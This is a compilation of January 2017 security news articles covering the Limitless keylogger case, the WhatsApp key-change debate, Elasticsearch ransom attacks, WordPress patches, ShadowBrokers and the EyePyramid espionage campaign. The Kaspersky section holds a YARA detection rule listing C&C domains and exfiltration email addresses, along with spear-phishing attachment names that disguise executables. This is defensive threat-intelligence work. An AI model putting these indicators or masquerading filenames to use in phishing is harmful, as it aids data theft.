According to a press release from the U.S. Department of Justice, Shames developed a keylogger in 2013 that allowed users to steal sensitive information, including passwords and banking credentials, from a victim's computer, while he was still a high school student in 2013.
Keylogger is malicious software designed to record every keystroke on a victim's computer.

Shames developed the first versions of now-defunct keylogger known as Limitless Logger Pro, which he sold for $35 on the infamous Hack Forums, according to an anonymous security researcher quoted by Motherboard.
Shames "continued to modify and market the illegal product from his college dorm room," at James Madison University in Harrisonburg, Va. and sold it to more than 3,000 people who, in turn, infected over 16,000 victims, the U.S. Attorney's Office said.
The keylogger malware developed by Shames slowly turned out into a powerful tool.
According to TrendMicro (pdf), apart from key-logging, Limitless KeyLogger can also recover account names and passwords from many popular applications, such as Apple Safari, Firefox, Opera, Google Chrome, Bitcoin wallets, Core FTP, DynDNS, FileZilla, Internet Download Manager, Internet Explorer, Spotify, and more.
Shames pleaded guilty in an Alexandria courtroom, and Judge Liam O'Grady accepted his plea.
Shames now faces a maximum penalty of up to 10 years in prison and has been sentenced to be scheduled for June 16, 2017.

Explained — What's Up With the WhatsApp 'Backdoor' Story? Feature or Bug!
15.1.2017 thehackernews Hacking
What is a backdoor?
By definition: "Backdoor is a feature or defect of a computer system that allows surreptitious unauthorized access to data, " either the backdoor is in encryption algorithm, a server or in an implementation, and doesn't matter whether it has previously been used or not.
Yesterday, we published a story based on findings reported by security researcher Tobias Boelter that suggests WhatsApp has a backdoor that "could allow" an attacker, and of course the company itself, to intercept your encrypted communication.
The story involving the world's largest secure messaging platform that has over a billion users worldwide went viral in few hours, attracting reactions from security experts, WhatsApp team, and Open Whisper Systems, who partnered with Facebook to implement end-to-end encryption in WhatsApp.
Note: I would request readers to read complete article before reaching out for a conclusion. And also, suggestions and opinions are always invited :)
What's the Issue:
The vulnerability relies on the way WhatsApp behaves when an end user's encryption key changes.
WhatsApp, by default, trusts new encryption key broadcasted by a contact and uses it to re-encrypt undelivered messages and send them without informing the sender of the change.
In my previous article, I have elaborated this vulnerability with an easy example, so you can head on to read that article for better understanding.

Facebook itself admitted to this WhatsApp issue reported by Boelter, saying that "we were previously aware of the issue and might change it in the future, but for now it's not something we're actively working on changing."
What Experts argued:
According to some security experts — "It's not a backdoor, rather it’s a feature to avoid unnecessarily re-verification of encryption keys upon automatic regeneration."
Open Whisper Systems says — "There is no WhatsApp backdoor," "it is how cryptography works," and the MITM attack "is endemic to public key cryptography, not just WhatsApp."
A spokesperson from WhatsApp, acquired by Facebook in 2014 for $16 Billion, says — "The Guardian's story on an alleged backdoor in WhatsApp is false. WhatsApp does not give governments a backdoor into its systems. WhatsApp would fight any government request to create a backdoor."
What's the fact:
Notably, none of the security experts or the company has denied the fact that, if required, WhatsApp, on government request, or state-sponsored hackers can intercept your chats.
What all they have to say is — WhatsApp is designed to be simple, and users should not lose access to messages sent to them when their encryption key is changed.
Open Whisper Systems (OWS) criticized the Guardian reporting in a blog post saying, "Even though we are the creators of the encryption protocol supposedly "backdoored" by WhatsApp, we were not asked for comment."
What? "...encryption protocol supposedly "backdoored" by WhatsApp…" NO!
No one has said it's an "encryption backdoor;" instead this backdoor resides in the way how end-to-end encryption has been implemented by WhatsApp, which eventually allows interception of messages without breaking the encryption.
As I mentioned in my previous story, this backdoor has nothing to do with the security of Signal encryption protocol created by Open Whisper Systems. It's one of the most secure encryption protocols if implemented correctly.
Then Why Signal is more Secure than WhatsApp?
You might be wondering why Signal private messenger is more secure than Whatsapp, while both use the same end-to-end encryption protocol, and even recommended by the same group of security experts who are arguing — "WhatsApp has no backdoor."
It's because there is always room for improvement.
The signal messaging app, by default, allows a sender to verify a new key before using it. Whereas, WhatsApp, by default, automatically trusts the new key of the recipient with no notification to the sender.
And even if the sender has turned on the security notifications, the app notifies the sender of the change only after the message is delivered.
So, here WhatsApp chose usability over security and privacy.
It’s not about 'Do We Trust WhatsApp/Facebook?':
WhatsApp says it does not give governments a "backdoor" into its systems.
No doubt, the company would definitely fight the government if it receives any such court orders and currently, is doing its best to protect the privacy of its one-billion-plus users.
But what about state-sponsored hackers? Because, technically, there is no such 'reserved' backdoor that only the company can access.
Why 'Verifying Keys' Feature Can't Protect You?

WhatsApp also offers a third security layer using which you can verify the keys of other users with whom you are communicating, either by scanning a QR code or by comparing a 60-digit number.
But here’s the catch:
This feature ensure that no one is intercepting your messages or calls at the time you are verifying the keys, but it does not ensure that no one, in the past had intercepted or in future will intercept your encrypted communication, and there is no way, currently, that would help you identify this.
WhatsApp Prevention against such MITM Attacks are Incomplete

WhatsApp is already offering a "security notifications" feature that notifies users whenever a contact's security code changes, which you need to turn on manually from app settings.
But this feature is not enough to protect your communication without the use of another ultimate tool, which is — Common Sense.
Have you received a notification indicating that your contact's security code has changed?
Instead of offering 'Security by Design,' WhatsApp wants its users to use their common sense not to communicate with the contact whose security key has been changed recently, without verifying the key manually.
The fact that WhatsApp automatically changes your security key so frequently (for some reasons) that one would start ignoring such notifications, making it practically impossible for users to actively looking each time for verifying the authenticity of session keys.
What WhatsApp should do?
Without panicking all one-billion-plus users, WhatsApp can, at least:
Stop regenerating users' encryption keys so frequently (I clearly don't know why the company does so).
Give an option in the settings for privacy-conscious people, which if turned on, would not automatically trust new encryption key and send messages until manually accepted or verified by users.
...because just like others, I also hate using two apps for communicating with my friends and work colleagues i.e. Signal for privacy and WhatsApp because everyone uses it.

Hackers that hit MongoDB installs now switch on exposed Elasticsearch clusters
15.1.2017 securityaffairs Hacking
The hackers that targeted MongoDB installations with ransom attacks now switch on the exposed Elasticsearch clusters with a similar tactic.
A few days ago I reported the news of a string of cyber attacks against MongoDB databases. Hackers broke into unprotected MongoDB databases, stealing their content, and asking for a ransom to return the data.
Now it seems that the same hackers have started targeting Elasticsearch clusters that are unprotected and accessible from the internet.

Elasticsearch is a Java-based search engine based on the free and open-source information retrieval software library Lucene. It is developed in Java and is released as open source, it is used by many organizations worldwide.

Crooks are targeting Elasticsearch cluster with ransom attacks in the same way they have made with MongoDB.

The news was reported on the official support forums this week, a user who was running a test deployment accessible from the internet reported hackers removed all the indices and added a new index “warning” was created there.

The user has found the following text from the raw index data:


Something quite similar to the recent ransom attacks against MongoDB.

“Late last week, a malicious attack was initiated, in which data from thousands of open source databases was copied, deleted and held for ransom. Although no malware, or “ransomware” was used in these attacks, and they are not related to product vulnerabilities, they nonetheless represent serious security incidents involving a data loss, or even a data breach.” reads the description of the discussion in the official forum. “The good news is that data loss from similar attacks is easily preventable with proper configuration.”


According to the security researcher Niall Merrigan, more than 600 Elasticsearch clusters have been targeted by the hackers.

Unfortunately, the number of internet-accessible Elasticsearch installs are much greater, roughly 35,000. The experts believe that the number of wiped Elasticsearch installs would rapidly increase, has it has happened for the MongoDB databases.

View image on Twitter
View image on Twitter
Niall Merrigan @nmerrigan
The #Elastic ransomware is speading .. now 600+ hosts
8:48 AM - 13 Jan 2017
10 10 Retweets 3 3 likes
It is important to protect Elasticsearch clusters exposed on the Internet as soon as possible, there is no reason to expose them.

Researchers from the company Itamar Syn-Hershko have published a blog post that includes recommendations for securing Elasticsearch installations.

“Have a Single Page Application that needs to query Elastic and get jsons for display? Pass it through a software facade that can do request filtering, audit-logging and most importantly, password-protect your data,” states the blog post. “Without that, (a) you are for sure binding to a public IP and you shouldn’t, (b) you are risking unwanted changes to your data, (c) and the worst – you can’t control who accesses what and all your data is visible for all to see. Just what’s happening now with those Elasticsearch clusters.”

The experts suggest disabling the features that users don’t need such as dynamic scripting with non-sandboxed languages (mvel, groovy) used in old versions.

As usual, let me suggest you to avoid paying, but report the incident to law enforcement.

@Kapustkiy is back and hacked the Government of Venezuela
14.1.2017 securityaffairs Hacking

The popular hacker Kapustkiy hacked a website belonging to the Government of Venezuela in protest against the dictatorship of Nicolas Maduro.
The White hat hacker Kapustkiy has hacked the Government of Venezuela and leaked data on Pastebin http://pastebin.com/ud0pewGL.

Kapustkiy hacked the website www.gdc.gob.ve by exploiting a Local File Inclusion (LFI) vulnerability in:


“I have found a LFI in the Capital website of the Government of Venezuela. And I hacked other two websites by exploiting a SQLi. I found around 800 users in the second website and the third website had 52 accounts.” said Kapustkiy. “I hacked them in protest against the dictatorship of Nicolas Maduro.”

The hacker hacked in protest against the President of Venezuela explaining that he is destroying the life of innocent people.

“Hacked By Kapustkiy from New World Hackers. I am against the dictatorship of Nicolas Maduro on Venezuela. I am tired of seeing, Nicolas Maduro is still running as president. It is time to leave, you motherfucker.” states the manifesto published on PasteBin.

Kapustkiy is currently working as white hat hacker reporting the flaws, but this time he made an exception for a political motivation.

In December 2016, Kapustkiy hacked the Russian Visa Center in the USA and accessed information of around 3000 individuals.

In the same month, the young hacker hacked the website of the Costa Rica Embassy in China and the breached the Slovak Chamber of Commerce (www.scci.sk) affecting more than 4,000 user records.

In 2016, Kapustkiy targeted several organizations, including the Consular Department of the Embassy of the Russian Federation, the Argentinian Ministry of Industry, the National Assembly of Ecuador, the Venezuela Army, the High Commission of Ghana & Fiji in India, the India Regional Council as well as organizations and embassies across the world.

He also broke into the ‘Dipartimento dellaFunzione Pubblica’ Office of the Italian Government, the Paraguay Embassy of Taiwan (www.embapartwroc.com.tw), and the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya.

WordPress 4.7.1 released, patches eight vulnerabilities and 62 bugs
14.1.2017 securityaffairs

According to the release notes the latest version of WordPress 4.7.1 addresses eight security vulnerabilities and other 62 bugs.
Wednesday the latest version of WordPress 4.7.1 was released by the WordPress Team, it is classified as a security release for all previous versions. According to the release notes, the new version addresses eight security flaws and other 62 bugs.

According to the WordPress team, the previous WordPress 4.7 release has been downloaded over 10 million times since its release on December 6, 2016.

The PHPMailer library was updated to patch a remote code execution (RCE) vulnerability, tracked as CVE-2016-10033. Aaron D. Campbell, WordPress Core developer, says that “No specific issue appears to affect WordPress or any of the major plugins we investigated but, out of an abundance of caution, we updated PHPMailer in this release”.

The experts, Brian Krogsgard and Chris Jean, discovered that the REST API “exposed data on all users who had authored a post of a public post type.”

WordPress 4.7.1

The new version addresses two Cross-site scripting(XSS) vulnerabilities in the WordPress plugins.

“Cross-site scripting (XSS) via the plugin name or version header on update-core.php. Reported by Dominik Schilling of the WordPress Security Team.” reads the advisory.

The second XSS resides in the “theme name fallback” and was reported by Mehmet Ince.

Among the issues fixed by the WordPress Team, there are also two Cross-site request forgery (CSRF) vulnerabilities.

The CSRF bypass via uploading a Flash file was reported by Abdullah Hussam, while Ronnie Skansing reported a CSRF in the accessibility mode of widget editing.

The researchers explained that one of theme identified by Abdullah Hussam can be exploited via a specially crafted Flash file, while the other affects the accessibility mode of widget editing, reported by Ronnie Skansing.

The new release also fixes a weak cryptographic security related to multisite activation key discovered by Jack, the expert described it in a blog post.

Another issue was discovered by John Blackbourn of the WordPress Security Team, it is a post via email checks mail.example.com if default settings aren’t changed.

“Download WordPress 4.7.1 or venture over to Dashboard → Updates and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.7.1” states the advisory.

A report recently issued by the security firm Sucuri claims that WordPress continues to be the most hacked CMS.

As explained in this article published weeks ago by Pierluigi Paganini, more than 8,800 WordPress Plugins out of 44,705 are flawed

“Security firm RIPS Technologies has analyzed 44,705 in the official WordPress plugins directory and discovered that more than 8,800 of them are flawed.” states the post.

WhatsApp Backdoor allows Hackers to Intercept and Read Your Encrypted Messages
13.1.2017 thehackernews
Most people believe that end-to-end encryption is the ultimate way to protect your secret communication from snooping, and it does, but it can be intercepted if not implemented correctly.
After introducing "end-to-end encryption by default" last year, WhatsApp has become the world's largest secure messaging platform with over a billion users worldwide.
But if you think your conversations are completely secure in a way that no one, not even Facebook, the company that owned WhatsApp, can intercept your messages then you are highly mistaken, just like most of us and it's not a new concept.
Here's the kick: End-to-end encrypted messaging service, such as WhatsApp and Telegram, contain a backdoor that can be used, if necessary, by the company and of course hackers, or the intelligence agencies to intercept and read your end-to-end encrypted messages, and that’s all without breaking the encryption.

And that backdoor is — TRUST.
No doubt most of the encrypted messaging services generate and store private encryption key offline on your device and only broadcast the public key to other users through the company's server.
Like, In the case of WhatsApp, we have to trust the company that it will not alter public key exchange mechanism between the sender and receiver to perform man-in-the-middle attack for snooping on your encrypted private communication.
Tobias Boelter, security researcher from the University of California, has reported that WhatsApp's end-to-end encryption, based on Signal protocol, has been implemented in a way that if WhatsApp or any hacker intercepts your chats by exploiting trust-based key exchange mechanism, you will never come to know if any change in encryption key has occurred in the background. YES, that's possible.
Note that this backdoor has nothing to do with the Signal encryption protocol, created by Open Whisper Systems. It's one of the most secure encryption protocols if implemented correctly.
“WhatsApp has implemented a backdoor into the Signal protocol, giving itself the ability to force the generation of new encryption keys for offline users and to make the sender re-encrypt messages with new keys and send them again for any messages that have not been marked as delivered. The recipient is not made aware of this change in encryption.” The Guardian reports.
However, users can receive notifications when security codes change, only if "security notifications" option has been turned ON manually from the app settings.

Meanwhile, Fredric Jacobs, who was iOS developer at Open Whisper Systems, also reacted on twitter and admitted that "if you don't verify keys Signal/WhatsApp/... can man-in-the-middle your communications," however he also added, "It's ridiculous that this is presented as a backdoor. If you don't verify keys, authenticity of keys is not guaranteed. Well known fact."
Facebook Haven't Fixed It Since June, 2016
Boelter told the Guardian that he reported the backdoor to Facebook in April 2016 -- the time when WhatsApp implemented end-to-end encryption by default in its messaging app.
However, the researcher was told in reply that Facebook was already aware of the issue and justified it as an "expected behavior."
"WhatsApp says that it implemented the backdoor to aid usability. If the backdoor is not in place, messages sent to an offline user, who then changes their smartphone or has to re-install WhatsApp and in doing so generates new security keys for themselves, would remain undelivered once the user comes back online." The Guardian says.
"In many parts of the world, people frequently change devices and Sim cards. In these situations, we want to make sure people’s messages are delivered, not lost in transit." a WhatsApp spokesperson told the Guardian.
And Yeah, the backdoor still exists in WhatsApp.
How to Protect Yourself from Spying?
To prevent the possibility of MITM attacks, WhatsApp also offers a third security layer in its app using which you can verify the keys of other users with whom you are communicating, either by scanning a QR code (drawback: physical presence required) or by comparing a 60-digit number by another way of communication.
"Security codes are just visible versions of the special key shared between you - and don't worry, it's not the actual key itself, that's always kept secret."
However, this option is useful only when you are actively looking to verify the authenticity of session keys and, we know, only one privacy-conscious paranoid user in thousands would do that.
Secure Alternative to Whatsapp
Oh! You must be thinking — Which secure messaging service then offers protection against such broken trust and interception?
There are several alternatives, such as "Signal Private Messenger", itself, developed by Open Whisper Systems and it's most recommended secure message app.

ShadowBrokers exits releasing another arsenal of tools to hack Windows
13.1.2017 securityaffairs BigBrothers

The ShadowBrokers hacking group that broke into the NSA arsenal and stole its hacking tools is signing off, leaving a gift to the security community.
The mysterious hacking group calling themselves “The Shadow Brokers” has apparently decided to put an end to their failed attempts to sell exploits and hacking tools they claimed to have stolen from the NSA-linked Equation Group.
A few days ago the notorious hacker group Shadow Brokers announced the sale of an archive of Windows exploits and hacking tools stolen from the NSA-linked Equation group.


The ShadowBrokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a database containing hacking tools and exploits.

In October 2016, the hackers leaked a dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .

The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.

In December 2016, the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

In December 2016, when they changed the model of sale offering the NSA’s hacking arsenal for direct sale on an underground website.

Now the group has decided to exit from the scene, according to the message published on the website it used for direct sales of the hacker tools, the hackers will go in the dark because continuing their activities is too risky.

The group explained that their main target was the sale of the stolen hacking tools and exploits, but no one has brought them.

Shadow Brokers crew published a Bitcoin address explaining that they would return in the case someone will pay 10,000 Bitcoins for the exploits. The offer will be valid forever.

Before leaving the cyber arena, the group decided to release some gifts, a collection of 58 Windows hacking tools. These tools are able to avoid detection of security solutions. If you are interested in downloading the precious archive visit the group’s website on ZeroNet:


Donald Trump appoints a CyberSecurity Advisor Whose Own Site is Damn Vulnerable
13.1.2017 thehackernews
Former New York City Mayor Rudolph W. Giuliani has been appointed as a cyber security advisor for the President-elect Donald Trump, but it appears that he never actually checked the security defenses of his own company's website.
Giuliani is going to head a new Cybersecurity Working group for the President-elect, and "will be sharing his expertise and insight as a trusted friend concerning private sector cyber security problems and emerging solutions developing in the private sector," the Trump's Transition Team announced Thursday.
Trump administration has appointed Giuliani after citing his 16 years of experience "providing security solutions in the private sector," but the news met online criticism with many users on Twitter asking:
'What does the former New York mayor know about cyber security?'

As the news broke, online users started scanning his website "www.giulianisecurity.com" and found that the site for Giuliani Security & Safety is simply a disaster.
The site runs on an old version of Joomla! — a free, open-source content management system (CMS) — which is vulnerable to more than a dozen flaws.
The website also uses an outdated version of the script language PHP, uses an expired SSL certificate, runs over a 10-year-old version of FreeBSD OS server and even fails to follow other basic security practices.
According to Robert Graham of Errata Security, Giuliani did not build the site himself; instead he "contracted with some generic web designer to put up a simple page with just some basic content."
"There's nothing on Giuliani's server worth hacking. The drama over his security, while an amazing joke, is actually meaningless," Graham said in a blog post. "All this tells us is that Verio/NTT.net is a crappy hosting provider, not that Giuliani has done anything wrong."
Although it really doesn't matter who has created the website, if you are in cyber security business to "help the government plan to make us more secure," such ignorance hardly inspires confidence in the expertise of that person.

Giuliani is the CEO of his own private-sector cybersecurity venture, Giuliani Partners, which is an international cyber security consulting firm that claims to offer "a comprehensive range of security and crisis management services."
What Giuliani Partners actually does is not known, because the company promotes its crime reduction successes in countries, but not its cybersecurity work.
The venture recently struck a deal with BlackBerry to provide companies and governments cyber security support by assessing infrastructures, identifying potential cyber security vulnerabilities, addressing gaps and securing endpoints "with the goal of offering another channel to bring customers to a new standard of security."
This clearly suggests that the company is doing something right.
Much details about Giuliani's role in the Trump administration were not immediately available. We'll update the story with new developments.

The “EyePyramid” attacks
13.1.2017 Kaspersky Cyber
On January 10, 2017, a court order was declassified by the Italian police, in regards to a chain of cyberattacks directed at top Italian government members and institutions.

The attacks leveraged a malware named “EyePyramid” to target a dozen politicians, bankers, prominent freemasons and law enforcement personalities in Italy. These included Fabrizio Saccomanni, the former deputy governor of the Bank of Italy, Piero Fassino, the former mayor of Turin, several members of a Masonic lodge, Matteo Renzi, former prime minister of Italy and Mario Draghi, president of the European Central Bank.

The malware was spread using spear-phishing emails and the level of sophistication is low. However, the malware is flexible enough to grant access to all the resources in the victim’s computer.

During the investigation, involved LEAs found more than 100 active victims in the server used to host the malware, as well as indications that during the last few years the attackers had targeted around 16,000 victims. All identified victims are in Italy, most of them being Law Firms, Consultancy services, Universities and even Vatican Cardinals.

Evidence found on the C&C servers suggests that the campaign was active since at least March 2014 and lasted until August 2016. However, it is suspected that the malware was developed and probably used years before, possibly as far back to 2008.

Two suspects were arrested on January 10th, 2017 and identified as 45-year-old nuclear engineer Giulio Occhionero and his 47-year-old sister Francesca Maria Occhionero.


Although the Italian Police Report doesn’t include malware hashes, it identified a number of C&C servers and e-mails addresses used by the malware for exfiltration of stolen data.

Excerpt from the Italian court order on #EyePyramid

Some of the e-mail addresses used for exfiltration and C&C domains outlined by the police report follow:

E-mail Addresses used for exfiltration
Command-and-Control Servers
Based on these indicators we’ve quickly written a YARA rule and ran it through our systems, in order to see if it matches any samples.

Here’s how our initial “blind”-written YARA rule looked like:

rule crime_ZZ_EyePyramid {


copyright = ” Kaspersky Lab”
author = ” Kaspersky Lab”
maltype = “crimeware”
filetype = “Win32 EXE”
date = “2016-01-11”
version = “1.0”


$a0=”eyepyramid.com” ascii wide nocase fullword
$a1=”hostpenta.com” ascii wide nocase fullword
$a2=”ayexisfitness.com” ascii wide nocase fullword
$a3=”enasrl.com” ascii wide nocase fullword
$a4=”eurecoove.com” ascii wide nocase fullword
$a5=”marashen.com” ascii wide nocase fullword
$a6=”millertaylor.com” ascii wide nocase fullword
$a7=”occhionero.com” ascii wide nocase fullword
$a8=”occhionero.info” ascii wide nocase fullword
$a9=”wallserv.com” ascii wide nocase fullword
$a10=”westlands.com” ascii wide nocase fullword
$a11=”″ ascii wide nocase fullword
$a12=”″ ascii wide nocase fullword
$a13=”″ ascii wide nocase fullword
$a14=”″ ascii wide nocase fullword
$a15=”″ ascii wide nocase fullword
$a16=”MN600-849590C695DFD9BF69481597241E-668C” ascii wide nocase fullword
$a17=”MN600-841597241E8D9BF6949590C695DF-774D” ascii wide nocase fullword
$a18=”MN600-3E3A3C593AD5BAF50F55A4ED60F0-385D” ascii wide nocase fullword
$a19=”MN600-AD58AF50F55A60E043E3A3C593ED-874A” ascii wide nocase fullword
$a20=”gpool@hostpenta.com” ascii wide nocase fullword
$a21=”hanger@hostpenta.com” ascii wide nocase fullword
$a22=”hostpenta@hostpenta.com” ascii wide nocase fullword
$a23=”ulpi715@gmx.com” ascii wide nocase fullword
$b0=”purge626@gmail.com” ascii wide fullword
$b1=”tip848@gmail.com” ascii wide fullword
$b2=”dude626@gmail.com” ascii wide fullword
$b3=”octo424@gmail.com” ascii wide fullword
$b4=”antoniaf@poste.it” ascii wide fullword
$b5=”mmarcucci@virgilio.it” ascii wide fullword
$b6=”i.julia@blu.it” ascii wide fullword
$b7=”g.simeoni@inwind.it” ascii wide fullword
$b8=”g.latagliata@live.com” ascii wide fullword
$b9=”rita.p@blu.it” ascii wide fullword
$b10=”b.gaetani@live.com” ascii wide fullword
$b11=”gpierpaolo@tin.it” ascii wide fullword
$b12=”e.barbara@poste.it” ascii wide fullword
$b13=”stoccod@libero.it” ascii wide fullword
$b14=”g.capezzone@virgilio.it” ascii wide fullword
$b15=”baldarim@blu.it” ascii wide fullword
$b16=”elsajuliette@blu.it” ascii wide fullword
$b17=”dipriamoj@alice.it” ascii wide fullword
$b18=”izabelle.d@blu.it” ascii wide fullword
$b19=”lu_1974@hotmail.com” ascii wide fullword
$b20=”tim11235@gmail.com” ascii wide fullword
$b21=”plars575@gmail.com” ascii wide fullword
$b22=”guess515@fastmail.fm” ascii wide fullword


((uint16(0) == 0x5A4D)) and (filesize < 10MB) and
((any of ($a*)) or (any of ($b*)) )

To build the YARA rule above we’ve used every bit of existing information, such as custom e-mail addresses used for exfiltration, C&C servers, licenses for the custom mailing library used by the attackers and specific IP addresses used in the attacks.

Once the YARA rule was ready, we’ve ran it on our malware collections. Two of the initial hits were:

MD5 778d103face6ad7186596fb0ba2399f2
File size 1396224 bytes
Type Win32 PE file
Compilation Timestamp Fri Nov 19 12:25:00 2010
MD5 47bea4236184c21e89bd1c1af3e52c86
File size 1307648 bytes
Type Win32 PE file
Compilation timestamp Fri Sep 17 11:48:59 2010
These two samples allowed us to write a more specific and more effective YARA rule which identified 42 other samples in our summary collections.

At the end of this blogpost we include a full list of all related samples identified.

Although very thorough, the Police Report does not include any technical details about how the malware was spread other than the use of spear phishing messages with malicious attachments using spoofed email addresses.

Nevertheless, once we were able to identify the samples shown above we used our telemetry to find additional ones used by the attackers for spreading the malware in spear-phishing emails. For example:

From: Di Marco Gianmaria
Subject: ricezione e attivazione
Time:2014/01/29 13:57:42
Attachment: contatto.zip//Primarie.accdb (…) .exe

From: Michelangelo Giorgianni
Time: 2014/01/28 17:28:56]
Attachment: Note.zip//sistemi.pdf (…) .exe

Other attachment filenames observed in attacks include:

Segnalazioni.doc (…) 7z.exe
Final Eight 2012 Suggerimenti Uso Auricolari.exe
Fwd Re olio di colza aggiornamento prezzo.exe
Eventi.bmp (…) .exe
Quotidiano.mdb (…) _7z.exe
Notifica operazioni in sospeso.exe
As can be seen the spreading relied on spearphishing e-mails with attachments, which relied on social engineering to get the victim to open and execute the attachment. The attachments were ZIP and 7zip archives, which contained the EyePyramid malware.

Also the attackers relied on executable files masking the extension of the file with multiple spaces. This technique is significant in terms of the low sophistication level of this attack.

High profile victims

Potential high-profile Italian victims (found as recipients of spear-phishing emails according to the police report) include very relevant Italian politicians such as Matteo Renzi or Mario Draghi.

It should be noted however there is no proof than any of them got successfully infected by EyePyramid – only that they were targeted.

Of the more than 100 active victims found in the server, there’s a heavy interest in Italian law firms and lawyers. Further standout victims, organizations, and verticals include:

Professional firms, Consultants Universities Vaticano
Construction firms Healthcare
Based on the KSN data for the EyePyramid malware, we observed 92 cases in which the malware was blocked, of which the vast majority (80%) of them were in Italy. Other countries where EyePyramid has been detected includes France, Indonesia, Monaco, Mexico, China, Taiwan, Germany and Poland.

Assuming their compilation timestamp are legit – and they do appear correct, most of the samples used in the attacks have been compiled in 2014 and 2015.


Although the “EyePyramid” malware used by the two suspects is neither sophisticated nor very hard to detect, their operation successfully compromised a large number of victims, including high-profile individuals, resulting in the theft of tens of gigabytes of data.

In general, the operation had very poor OPSEC (operational security); the suspects used IP addresses associated with their company in the attacks, discussed the victims using regular phone calls and through WhatsApp and, when caught, attempted to delete all the evidence.

This indicates they weren’t experts in the field but merely amateurs, who nevertheless succeeded in stealing considerably large amounts of data from their victims.

As seen from other known cyberespionage operations, it’s not necessary for the attackers to use high profile malware, rootkits, or zero-days to run long-standing cyberespionage operations.

Perhaps the most surprising element of this story is that Giulio Occhionero and Francesca Maria Occhionero ran this cyber espionage operation for many years before getting caught.

Kaspersky Lab products successfully detect and remove EyePyramid samples with these verdicts:

A full report #EyePyramid, including technical details of the malware, is available to customers of Kaspersky APT Intelligence Services. Contact: intelreports (at) kaspersky [dot] com.

To learn how to write YARA rules like a GReAT Ninja, consider taking a master class at Security Analyst Summit. – https://sas.kaspersky.com/#trainings

References and Third-Party Articles

Indicators of Compromise



Related hashes identified by @GaborSzappanos:


Backdoor Filenames:


Malicious attachments filenames (weak indicators):

contatto.zip//Primarie.accdb (…) .exe
Note.zip//sistemi.pdf (…) .exe
Segnalazioni.doc (…) 7z.exe
Final Eight 2012 Suggerimenti Uso Auricolari.exe
Fwd Re olio di colza aggiornamento prezzo.exe
Eventi.bmp (…) .exe
Quotidiano.mdb (…) _7z.exe

Holiday 2016 financial cyberthreats overview
13.1.2017 Kaspersky Cyber

Last November we conducted a brief analysis of the threat landscape over the holiday period – from October to December in 2014 and 2015 – to find out if the number of financial cyberattacks during this time differs to that usually seen throughout the year. The retrospective analysis found that the percentage of phishing attacks during this period was higher than the average yearly rate. The dynamics of financial malware attacks also clearly showed that in 2014 and 2015, criminals staged their malicious campaigns to match dates around the Black Friday – Cyber Monday period, and also around Christmas and the New Year.

Based on this data we made the following prognosis: the same holiday period in 2016 will see a spike in cyberattacks. Now that the holidays are over, it is time to find out how accurate that prediction was.

Financial phishing

The numbers

As seen in the table below, unlike in previous years, the difference between the overall yearly results and the results in Q4 is not significant. However, the percentage of financial phishing attacks blocked by Kaspersky Lab products in Q4 2016 was higher than the total average for the year.

2013 Full year Q4
Financial phishing total 31.45% 32.02%
E-shop 6.51% 7.80%
E-banks 22.20% 18.76%
E-payments 2.74% 5.46%
2014 Full year Q4
Financial phishing total 28.73% 38.49%
E-shop 7.32% 12.63%
E-banks 16.27% 17.94%
E-payments 5.14% 7.92%
2015 Full year Q4
Financial phishing total 34.33% 43.38%
E-shop 9.08% 12.29%
E-banks 17.45% 18.90%
E-payments 7.08% 12.19%
2016 Full year Q4
Financial phishing total 47.48% 48.13%
E-shop 10.17% 10.41%
E-banks 25.76% 26.35%
E-payments 11.55% 11.37%
Moreover, the Q4 2016 results are the highest we’ve seen so far. 48.13% of all phishing attacks registered by Kaspersky Lab products were focused on gleaning users’ financial data, which is 0.65% higher than the average share of financial phishing in 2016, and 4.75% more than in the same period in 2015. However, the holiday period is not the only reason for such a high percentage of financial attacks. Phishing scams are the easiest way for even low level professional criminals to earn money. The preparation and supporting stages for such scams don’t require a lot of specific tools or knowledge, yet they bring a good return. In other words, phishing attacks appear more attractive to criminals due to their ease and affordability, when compared to staging a financial malware attack. This has resulted in the growth in popularity of phishing.

Delivered on time

As evidenced in our original analysis of the threat landscape during the holiday period in 2014 and 2015, criminals were trying to tie their phishing campaigns to certain dates which resulted in a visible increase in the number of attacks during the Black Friday, Cyber Monday and also Christmas periods. The 2016 figures showed no difference but we’ve seen an increase in the number of attacks which utilized well-known brands from the online retail and financial industries.

Holiday 2016 financial cyberthreats overview - update

As seen on the graph above, the spikes of detections of Amazon-themed phishing scams matched the dates of Black Friday and Cyber Monday 2016 almost perfectly. The same dynamics are repeated with some other topical brands including payment systems.

Holiday 2016 financial cyberthreats overview - update

Interestingly, the dynamics during the Christmas period are different. As seen below, the number of attacks started decreasing several days prior to Christmas Eve, and then went up on 25th of December.

Holiday 2016 financial cyberthreats overview - update

Holiday 2016 financial cyberthreats overview - update

Holiday 2016 financial cyberthreats overview - update

Such synchronous behavior could be explained by multiple factors, one of which is that cybercriminals are also celebrating Christmas and that the overall number of web users also decreases on 24th December. But on 25th December, the number of attacks goes back up.

Scams: from Black Friday to Christmas-themed

In our initial report, we examined some examples of so-called topical phishing scams dedicated to a specific topic – the Black Friday sales. While the report was published several weeks before the actual sales started, we already identified some examples of Black Friday-themed phishing scams. Closer to the start of the sales some new examples appeared.

Holiday 2016 financial cyberthreats overview - update

Example of a Black Friday-themed phishing scam offering a smartphone with 65% discount.

Holiday 2016 financial cyberthreats overview - update

Example of a Black Friday-themed phishing scam offering a TV for an attractive price.

The scams mostly promoted personal electronics, like smartphones and TVs, at extremely low prices, and tried to lure users into providing payment information to criminals. With Christmas approaching, the topics of scams changed accordingly. In December, our researchers started to detect Christmas and New Year-themed phishing schemes.

Holiday 2016 financial cyberthreats overview - update

